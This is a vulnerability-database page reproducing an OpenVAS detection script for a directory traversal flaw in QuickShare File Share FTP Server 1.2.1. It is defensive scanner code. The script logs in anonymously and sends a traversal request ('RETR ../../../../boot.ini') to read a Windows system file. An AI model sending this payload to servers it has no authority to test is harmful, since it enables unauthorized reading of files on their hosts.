Lucene search
K

QuickShare File Share FTP Server Directory Traversal Vulnerability

🗓️ 07 Feb 2011 00:00:00Reported by Copyright (C) 2011 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 10 Views

QuickShare File Share FTP Server Directory Traversal Vulnerability. Successful exploitation allows attackers to read arbitrary files. The flaw is due to an error while handling requests containing 'dot dot' sequences and back slashes in URL, allowing exploitation through directory traversal attack. Upgrade to QuickShare File Share version 1.2.2 or later. The host is prone to directory traversal vulnerability

Refs
Code
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_quicksharehq_ftp_server_dir_trav_vuln.nasl 7019 2017-08-29 11:51:27Z teissa $
#
# QuickShare File Share FTP Server Directory Traversal Vulnerability
#
# Authors:
# Veerendra GG <[email protected]>
#
# Copyright:
# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.ne
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will allow attackers to read arbitrary
files on the affected application.

Impact Level: Application";

tag_affected = "QuickShare File Share 1.2.1";

tag_insight = "The flaw is due to an error while handling certain requests
containing 'dot dot' sequences (..) and back slashes in URL, which can be
exploited to download arbitrary files from the host system via directory
traversal attack.";

tag_solution = "Upgrade to QuickShare File Share version 1.2.2 or later.
For updates refer to http://www.quicksharehq.com/";

tag_summary = "The host is running QuickShare File Share FTP Server and is
prone to directory traversal vulnerability.";

if(description)
{
  script_id(800197);
  script_version("$Revision: 7019 $");
  script_tag(name:"last_modification", value:"$Date: 2017-08-29 13:51:27 +0200 (Tue, 29 Aug 2017) $");
  script_tag(name:"creation_date", value:"2011-02-07 15:21:16 +0100 (Mon, 07 Feb 2011)");
  script_tag(name:"cvss_base", value:"6.4");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:N");
  script_name("QuickShare File Share FTP Server Directory Traversal Vulnerability");
  script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/16105/");
  script_xref(name : "URL" , value : "http://securityreason.com/exploitalert/9927");
  script_xref(name : "URL" , value : "http://packetstormsecurity.org/files/view/98137/quicksharefs-traverse.txt");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
  script_family("FTP");
  script_dependencies("find_service.nasl", "secpod_ftp_anonymous.nasl");
  script_require_ports("Services/ftp", 21);
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  exit(0);
}

##
## The script code starts here
##

include("ftp_func.inc");

## Get the default port of FTP
ftpPort = get_kb_item("Services/ftp");
if(!ftpPort){
  ftpPort = 21;
}

## check port status
if(!get_port_state(ftpPort)){
  exit(0);
}

## Get the FTP banner and confirm the application
banner = get_ftp_banner(port:ftpPort);
if("220 quickshare ftpd" >!< banner){
  exit(0);
}

## Open Socket to ftp port
soc1 = open_sock_tcp(ftpPort);
if(!soc1){
  exit(0);
}

## Get Username and Password from KB
user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");

## Try for anonymous user and password, if not given
if(!user){
  user = "anonymous";
}

if(!pass){
  pass = string("anonymous");
}

## Login using above credentials
login_details = ftp_log_in(socket:soc1, user:user, pass:pass);
if(login_details)
{
  ## Change to PASV Mode
  ftpPort2 = ftp_get_pasv_port(socket:soc1);

  if(ftpPort2)
  {
    ## Open a Socket for receiving the data
    soc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));
    if(soc2)
    {
      ## Construct and send the attack request to first socket
      attackreq = "RETR ../../../../../../../../boot.ini";
      send(socket:soc1, data:string(attackreq, "\r\n"));

      ## Receive the data in second socket
      attackres = ftp_recv_data(socket:soc2);

      ## Confirm the Exploit by checking the contents of boot.ini file
      if(attackres && "[boot loader]" >< attackres)
      {
        security_message(port:ftpPort);

        ## Close all the connections
        ftp_close(socket:soc1);
        close(soc1);
        close(soc2);
        exit(0);
      }
      close(soc2);
    }
  }
  ## Close FTP Connection
  ftp_close(socket:soc1);
}

## Close the socket
close(soc1);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation